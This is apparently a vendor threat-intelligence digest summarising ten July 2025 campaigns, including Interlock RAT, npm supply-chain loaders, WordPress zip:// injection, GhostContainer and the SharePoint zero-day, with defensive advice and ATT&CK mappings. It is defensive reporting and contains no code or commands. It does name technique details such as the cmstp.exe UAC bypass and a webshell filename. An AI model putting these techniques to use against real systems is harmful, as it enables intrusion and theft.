Anomali Cyber Watch: Interlock RAT, North Koreans Flood npm Registry, Stealthy WordPress PHP Malware, and Semiconductor Sector Hacks
The July 22nd edition of Anomali Cyber Watch covers the following topics: Interlock Remote Access Trojan (RAT), North Korean threat actors, WordPress PHP Malware, a malicious Cursor AI IDE extension, semiconductor sector attacks, hyper-volumetric DDoS attacks, the GhostContainer backdoor, Katz Stealer, a cryptojacking campaign, and a Microsoft Sharepoint Zero-Day vulnerability. The IoCs related to these stories are referenced below and can be used by Anomali ThreatStream users to analyze potential malicious activity.
New PHP-Based Interlock RAT Variant Uses FileFix Delivery Mechanism to Target Multiple Industries
(published: July 14, 2025)
Threat actors linked to the Interlock ransomware gang have introduced a new PHP-based variant of their custom Remote Access Trojan (RAT), delivered through a refined social-engineering method called “FileFix.” Beginning around May 2025, attackers have been compromising legitimate websites, injecting scripts that redirect visitors to fake CAPTCHA pages. Users are then tricked into pasting commands into File Explorer, triggering a PowerShell script that installs the PHP RAT. Once executed, the malware performs detailed system reconnaissance (including privilege checks), exfiltrates data in JSON format, and establishes command-and-control channels via Cloudflare Tunnel with fallback IPs. It can download additional payloads, modify registry settings for persistence, and use RDP for lateral movement. A PHP variant may also serve as a precursor to deploying the Node.js-based RAT variant known as NodeSnake. Features like Cloudflare Tunnel obfuscation and dual-language architecture underscore Interlock’s evolving sophistication and broad targeting across industries.
Analyst Comment: This attack leans on simple user behavior rather than flashy exploits, which makes it easy to miss and hard to stop. Asking someone to paste a command into File Explorer may not raise alarms for some, but it should. The switch to a PHP-based RAT gives attackers more flexibility, especially when paired with hidden tunnels like Cloudflare. To stay ahead, tighten controls around PowerShell use, monitor unusual clipboard or browser activity, and most importantly, teach users to pause when a website asks them to run anything locally.
MITRE ATT&CK: T1204 - User Execution | T1059.001 - Command and Scripting Interpreter: Powershell | T1059.003 - Command and Scripting Interpreter: Windows Command Shell | T1547.001 - Boot or Logon Autostart Execution: Registry Run Keys / Startup Folder | T1082 - System Information Discovery | T1083 - File And Directory Discovery | T1016 - System Network Configuration Discovery | T1057 - Process Discovery | T1087 - Account Discovery | T1069.001 - Permission Groups Discovery: Local Groups | T1090.004 - Proxy: Domain Fronting | T1041 - Exfiltration Over C2 Channel | T1021.001 - Remote Services: Remote Desktop Protocol
North Korean Hackers Flood npm Registry with XORIndex Malware
(published: July 15, 2025)
North Korean state‑sponsored actors, tied to the “Contagious Interview” campaign, have uploaded 67 malicious packages to the npm repository. These packages have been downloaded over 17,000 times. They deploy a novel obfuscated loader known as XORIndex, alongside older loaders like HexEval, to profile systems and fetch second-stage malware, primarily the BeaverTail information stealer and subsequent InvisibleFerret backdoor. The attackers use social engineering tactics, impersonating recruiters on platforms such as LinkedIn and Discord, to convince developers to install these packages as part of fake “coding assignments”. XORIndex utilizes Vercel-hosted command-and-control infrastructure and sophisticated obfuscation, marking a clear escalation in North Korea’s software supply chain strategies. Despite takedown efforts, remnants of the campaign linger, with attackers poised to release fresh variants via new aliases.
Analyst Comment: This campaign blends technical stealth with smart social engineering, turning developer curiosity into a foothold for compromise. By framing malicious packages as coding assignments from fake recruiters, the attackers sidestepped traditional defenses and went straight for trust. XORIndex adds another layer of complexity, using obfuscation and legitimate cloud services to stay hidden. This isn’t just a supply-chain problem, it’s a people problem. Defenders need to pair technical controls like package vetting and network monitoring with clear internal guidance on how to handle unsolicited outreach and code from unknown sources.
MITRE ATT&CK: T1195.002 - Supply Chain Compromise: Compromise Software Supply Chain | T1059.006 - Command and Scripting Interpreter: Python | T1082 - System Information Discovery | T1071.001 - Application Layer Protocol: Web Protocols | T1105 - Ingress Tool Transfer | T1555 - Credentials From Password Stores | T1041 - Exfiltration Over C2 Channel | T1547.001 - Boot or Logon Autostart Execution: Registry Run Keys / Startup Folder
Stealthy PHP Malware Uses ZIP Archive to Redirect WordPress Visitors
(published: July 15, 2025)
A newly identified malware campaign targets WordPress sites by injecting two lines of PHP into the wp-settings.php core file. One line extracts the site's domain from the HTTP_HOST header, while the other uses PHP’s zip:// wrapper to include a domain-specific file hidden within a win.zip archive. The extracted PHP payload is heavily obfuscated and conducts visitor-specific redirects, dynamically selects Command‑and‑Control (C2) servers, avoids bots like Googlebot, injects malicious sitemaps into robots.txt, and manipulates SEO files. The attack’s main goal is search‑engine poisoning—leveraging compromised site trust to promote spam or malicious domains. Indicators of compromise include domain-named entries in win.zip and modified core files.
Analyst Comment: By injecting spam content and fake sitemaps, it exploits a site’s reputation to boost malicious domains in search results. That damage lingers long after cleanup, especially if your site gets flagged by search engines or browsers. The use of ZIP-based payloads, layered obfuscation, and bot evasion means most owners won’t spot it without expert help. Staying ahead of this kind of threat takes layered defense: keep WordPress and plugins updated, use only trusted sources, enforce strong passwords and 2FA, and deploy a web application firewall. Regular scans help, but file integrity monitoring and outbound traffic checks are just as important.
MITRE ATT&CK: T1190 - Exploit Public-Facing Application | T1059.005 - Command and Scripting Interpreter: Visual Basic | T1505.003 - Server Software Component: Web Shell | T1027 - Obfuscated Files Or Information | T1222.002 - File and Directory Permissions Modification: Linux And Mac File And Directory Permissions Modification | T1036 - Masquerading | T1071.001 - Application Layer Protocol: Web Protocols | T1491.002 - Defacement: External Defacement
Malicious VSCode Extension in Cursor AI IDE Leads to $500K Crypto Theft
(published: July 18, 2025)
A malicious “Solidity Language” extension, distributed via the Open VSX registry for the Cursor AI IDE (a VSCode-based environment), infected developer systems with a multi-stage malware chain. After installation, the extension’s extension.js script executed a remote PowerShell payload from angelic[.]su, installed ScreenConnect for persistence, and deployed VBScript loaders. These payloads installed Quasar RAT and the PureLogs stealer, enabling attackers to extract browser cookies, credentials, and crypto-wallet seed phrases. One Russian blockchain developer lost roughly $500,000 in cryptocurrency. The fake extension had been downloaded over 54,000 times before removal and shortly reappeared under a look‑alike name (“solidity”) with nearly 2 million installs—highlighting deliberate manipulation of trust and search rankings in the Open VSX ecosystem.
Analyst Comment: This attack again shows how easily trust can be exploited in developer tools. A plugin that looks helpful and popular can quietly open the door to full compromise. It is a reminder that even experienced users can be caught out when familiar platforms are abused. To reduce risk, teams should vet extensions more carefully, limit what they can access, and use behavior monitoring to catch anything unusual early. Managing your own trusted plugin list and avoiding direct installs from public registries can also help keep environments cleaner and more secure.
MITRE ATT&CK: T1059.001 - Command and Scripting Interpreter: Powershell | T1105 - Ingress Tool Transfer | T1547.001 - Boot or Logon Autostart Execution: Registry Run Keys / Startup Folder
Chinese Hackers Target Taiwan's Semiconductor Sector with Cobalt Strike, Custom Backdoors
(published: July 17, 2025)
Taiwan’s critical semiconductor infrastructure has been recently targeted by at least three distinct Chinese state-sponsored threat actors, including one labeled UNK_FistBump. Between March and July 2025, these attackers deployed spear-phishing campaigns disguised as employment inquiries to trick victims into executing Cobalt Strike payloads or a bespoke C-based backdoor named “Voldemort.” Targets include semiconductor design, packaging, manufacturing and supply-chain firms. These operations indicate ongoing strategic cyber espionage aimed at extracting proprietary semiconductor intellectual property and compromising critical supply-chain components.
Analyst Comment: Masquerading as graduate jobseekers, the attackers targeted HR teams with LNK files disguised as resumes, trusted entry points often overlooked in security planning. Once opened, the file launched a multi-stage payload while displaying a decoy document to keep suspicion low. This isn’t just clever social engineering, it’s targeted misuse of everyday business processes. HR-facing workflows, especially those involving file handling, need tighter scrutiny. Security awareness can’t stop at IT, teams handling unsolicited documents must be part of the threat model. Detection helps, but prevention here starts with better internal process design.
MITRE ATT&CK: T1566.001 - Phishing: Spearphishing Attachment | T1566.002 - Phishing: Spearphishing Link | T1566.003 - Phishing: Spearphishing Via Service | T1204.002 - User Execution: Malicious File | T1574.001 - Hijack Execution Flow: Dll Search Order Hijacking | T1071.001 - Application Layer Protocol: Web Protocols | T1041 - Exfiltration Over C2 Channel | T1547.001 - Boot or Logon Autostart Execution: Registry Run Keys / Startup Folder | T1059.005 - Command and Scripting Interpreter: Visual Basic | T1219 - Remote Access Software
Hyper‑Volumetric DDoS Attacks Reach Record 7.3 Tbps
(published: July 15, 2025)
Cloudflare has reported a sharp evolution in DDoS tactics, marked by short-burst “hyper-volumetric” attacks that peaked at 7.3 terabits per second and 4.8 billion packets per second. These surges, lasting less than a minute, are designed to overwhelm defenses before automated mitigation systems can respond. The infrastructure behind them is changing too—botnets are now increasingly powered by compromised cloud-hosted virtual machines alongside traditional IoT devices. New attack vectors like Teeworlds, VxWorks floods, and legacy RIPv1 protocols are being abused to evade filters and exploit unpatched services. While the total number of HTTP DDoS attacks declined this quarter, ransom-based attacks rose by 68%, showing a shift in motive from disruption to extortion. Telecommunications, hosting, and gaming sectors were the most frequently targeted.
Analyst Comment: Short-burst, high-volume DDoS attacks are designed to overwhelm defenses before automated mitigation can respond. Traditional rate-based detection often misses these brief spikes. Organizations should adopt real-time anomaly detection, disable unused or legacy protocols like RIPv1, and harden exposed services at the edge. DDoS response plans must be tested regularly and include coordination with upstream providers. With ransom-based DDoS threats on the rise, these attacks should be treated as part of broader extortion risk, not just network noise.
MITRE ATT&CK: T1498 - Network Denial Of Service | T1498.001 - Network Denial of Service: Direct Network Flood | T1498.002 - Network Denial of Service: Reflection Amplification
GhostContainer backdoor compromises Microsoft Exchange in Asia
(published: July 17, 2025)
A newly identified backdoor, named GhostContainer, targets Microsoft Exchange servers, primarily within government and high-tech organizations in Asia. Discovered during an incident response in mid‑July, the malware leverages a known Exchange “N‑day” vulnerability (likely CVE‑2020‑0688), disguises itself as a legitimate server component, and uses open‑source code for modular, extensible control. It bypasses detection by disabling AMSI and Windows event logging, then establishes covert command-and-control via HTTP requests containing encoded payloads. GhostContainer consists of three main functional classes: a C2 parser and dispatcher (“Stub”), a virtual page injector, and a web proxy/tunnel module derived from Neo‑reGeorg. It allows full server compromise, command execution, data exfiltration, tunneling, and uses stolen ASP.NET machine keys for encrypted communications. Victims include at least one government agency and a high‑tech firm. Attribution remains unclear, but evidence suggests a mature, professional APT actor.
Analyst Comment: GhostContainer highlights how attackers continue to exploit known Exchange flaws by embedding stealthy, modular implants into trusted server components. Its use of open-source tools and legitimate ASP.NET structures makes detection difficult in environments that assume they are secure. Patching is necessary but not enough. Defenders should hunt for rogue ASPX pages, suspicious DLLs, and unexpected proxy behavior. Monitoring for unusual headers like “Qprtfva” and reviewing machineKey configurations can help uncover compromise. Potentially GhostContainer is a reminder that mature threat actors often rely on overlooked systems and blind spots rather than novel techniques.
MITRE ATT&CK: T1190 - Exploit Public-Facing Application | T1059 - Command And Scripting Interpreter | T1620 - Reflective Code Loading | T1562.001 - Impair Defenses: Disable Or Modify Tools | T1562.002 - Impair Defenses: Disable Windows Event Logging | T1562.006 - Impair Defenses: Indicator Blocking | T1134.002 - Access Token Manipulation: Create Process With Token | T1550 - Use Alternate Authentication Material | T1090.003 - Proxy: Multi-Hop Proxy | T1041 - Exfiltration Over C2 Channel
Katz Stealer Infostealer Expands Across Credentials & Crypto
(published: July 17, 2025)
Katz Stealer, a powerful information‑stealer offered as Malware‑as‑a‑Service (MaaS), has rapidly gained traction since its launch in early 2025. It is marketed affordably via Telegram, Discord, and cybercrime forums, featuring a web-based control panel that enables users to build customized payloads, manage campaigns, and exfiltrate data. Katz employs multi-stage infection—phishing emails deliver obfuscated JavaScript droppers that load a steganographically concealed payload via PowerShell. A UAC bypass using cmstp.exe leads to process-hollowing into MSBuild.exe for stealth. The stealer focuses on browser-stored credentials (defeating encryption mechanisms), crypto wallets (desktop and browser extensions), messaging platforms, system credentials, screenshots, clipboard data, and audio/video captures. Persistent C2 channels use unique user-agents for hiding, and the malware cleans up traces post-exfiltration. Its low price and turnkey design are driving widespread adoption by both novice and advanced threat actors
Analyst Comment: Katz Stealer shows how advanced malware is becoming easy to access and use, lowering the barrier for cybercrime. Its stealthy delivery and broad targeting make it effective across user types. Defenders should focus on phishing awareness, disable unnecessary scripting engines, and enforce application controls. Use browser hardening and avoid storing credentials locally.
MITRE ATT&CK: T1204.001 - User Execution: Malicious Link | T1059.007 - Command and Scripting Interpreter: Javascript | T1218.003 - Signed Binary Proxy Execution: Cmstp | T1055.012 - Process Injection: Process Hollowing | T1547.001 - Boot or Logon Autostart Execution: Registry Run Keys / Startup Folder | T1555.003 - Credentials from Password Stores: Credentials From Web Browsers | T1555.004 - Credentials from Password Stores: Windows Credential Manager | T1113 - Screen Capture | T1115 - Clipboard Data | T1123 - Audio Capture | T1125 - Video Capture | T1041 - Exfiltration Over C2 Channel | T1027.001 - Obfuscated Files or Information: Binary Padding | T1036.002 - Masquerading: Right-To-Left Override
3,500 Websites Hijacked to Secretly Mine Crypto Using Stealth JavaScript and WebSocket Tactics
(published: July 20, 2025)
Over 3,500 websites have been compromised in a widespread cryptojacking campaign. Attackers injected obfuscated JavaScript miners that leverage Web Workers and WebSockets to covertly mine Monero or similar coins via site visitors’ browsers. The script adapts to device performance, throttling CPU use to avoid detection. It pulls mining tasks from attacker-controlled infrastructure and uses stealth techniques to remain hidden. Notably, the same malicious infrastructure has previously hosted Magecart skimming tools, highlighting a dual-use setup aimed at maximising profits.
Analyst Comment: This campaign shows how cryptojacking has matured. Instead of drawing obvious attention through high CPU usage, the malware adapts its resource use to avoid suspicion. The reuse of Magecart-linked domains suggests a deliberate effort to build versatile infrastructure for multiple revenue streams. Defenders should monitor for suspicious WebSocket traffic, audit third-party scripts, and enforce strict Content Security Policies. Prevention now relies less on detecting obvious resource abuse and more on spotting subtle behavioural anomalies in client-side traffic.
MITRE ATT&CK: T1190 - Exploit Public-Facing Application | T1059.007 - Command and Scripting Interpreter: Javascript | T1505.003 - Server Software Component: Web Shell | T1071.001 - Application Layer Protocol: Web Protocols | T1496 - Resource Hijacking | T1027 - Obfuscated Files Or Information | T1497.001 - Virtualization/Sandbox Evasion: System Checks
Microsoft SharePoint Zero‑Day Under Active Exploitation
(published: July 20, 2025)
A critical zero day vulnerability (CVE 2025 53770) in on premises Microsoft SharePoint Server is being actively exploited. The flaw, stemming from insecure deserialization, allows unauthenticated remote code execution and theft of machine keys. Attackers have deployed stealthy webshells such as spinstall0.aspx to extract cryptographic secrets, enabling persistent access and lateral movement. Hundreds of global organizations including U.S. federal and state agencies, energy firms, universities, telecoms, and European governments have been compromised since at least July 18 to 19. Although SharePoint Online remains safe, on premises servers running 2016, 2019, and Subscription Edition are at risk.
Analyst Comment: The real risk here is not just code execution but the theft of machine keys, which allows attackers to maintain access even after patching. If you are running affected SharePoint servers, treat this as an active compromise. Rotate keys, check for webshells, and do not rely on patching alone. Public-facing systems should be isolated, and Defender with AMSI enabled provides a strong first layer of defense.
MITRE ATT&CK: T1190 - Exploit Public-Facing Application | T1059.005 - Command and Scripting Interpreter: Visual Basic | T1505.003 - Server Software Component: Web Shell | T1556.001 - Modify Authentication Process: Domain Controller Authentication | T1552.004 - Unsecured Credentials: Private Keys | T1550.003 - Use Alternate Authentication Material: Pass The Ticket | T1036.005 - Masquerading: Match Legitimate Name Or Location
Discover More About Anomali
Get the latest news about cybersecurity, threat intelligence, and Anomali's Security and IT Operations platform.
Propel your mission with amplified visibility, analytics, and AI.
Learn how Anomali can help you cost-effectively improve your security posture.
